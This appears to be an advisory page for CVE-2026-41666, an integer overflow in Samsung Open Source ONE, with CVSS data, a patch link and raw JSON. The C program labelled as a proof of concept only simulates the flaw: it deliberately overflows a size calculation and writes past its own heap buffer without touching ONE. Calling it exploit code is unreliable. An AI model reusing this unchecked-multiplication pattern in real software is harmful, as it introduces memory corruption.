Security Vulnerability Report
CVE-2026-41666 CVSS 6.6 MEDIUM

Published: 2026-04-22 07:16:14
Last Modified: 2026-04-27 18:21:31

Description

Integer overflow in tensor copy size calculation in Samsung Open Source ONE could lead to out of bounds access during loop state propagation. Affected version is prior to commit 1.30.0.

CVSS Details

CVSS Score: 6.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:samsung:one:*:*:*:*:*:*:*:* - VULNERABLE
Samsung Open Source ONE < commit 1.30.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

// PoC for Integer Overflow in Tensor Copy Size Calculation
// This simulates the vulnerability in Samsung Open Source ONE
void simulate_vulnerability(uint32_t dim1, uint32_t dim2) {
    printf("[*] Calculating tensor copy size: %u * %u\n", dim1, dim2);

    // Vulnerable calculation: Integer overflow occurs here
    // If dim1 and dim2 are large enough, the result wraps around
    uint32_t copy_size = dim1 * dim2;
    printf("[+] Calculated copy_size (overflowed): %u\n", copy_size);

    // Memory allocation based on the incorrect (small) size
    char *buffer = (char *)malloc(copy_size);
    if (buffer == NULL) {
        printf("[-] Allocation failed.\n");
        return;
    }
    printf("[+] Buffer allocated with size: %u\n", copy_size);

    // Simulate loop state propagation writing data
    // Assuming the actual amount of data to write is much larger
    uint32_t actual_data_length = 0x10000;
    printf("[*] Attempting to write %u bytes into buffer...\n", actual_data_length);

    // This loop causes Out-of-Bounds write
    for (uint32_t i = 0; i < actual_data_length; i++) {
        if (i < copy_size) {
            buffer[i] = 'A'; // Safe
        } else {
            // Out of bounds access - Crash or Corruption
            buffer[i] = 'B';
        }
    }

    free(buffer);
}

int main(void) {
    printf("PoC for CVE-2026-41666\n");
    // Trigger values that cause overflow (e.g., 0x10000 * 0x10000 = 0 in 32-bit)
    simulate_vulnerability(0x10000, 0x10000);
    return 0;
}

References

https://github.com/Samsung/ONE/pull/16481 (Issue Tracking, Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41666", "sourceIdentifier": "[email protected]", "published": "2026-04-22T07:16:13.867", "lastModified": "2026-04-27T18:21:30.740", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Integer overflow in tensor copy size calculation in Samsung Open Source ONE could lead to out of bounds access during loop state propagation.\nAffected version is prior to commit 1.30.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samsung:one:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.30.0", "matchCriteriaId": "4DBBA2E4-036F-40C0-B2EF-D14AB3C83B6E"}]}]}], "references": [{"url": "https://github.com/Samsung/ONE/pull/16481", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}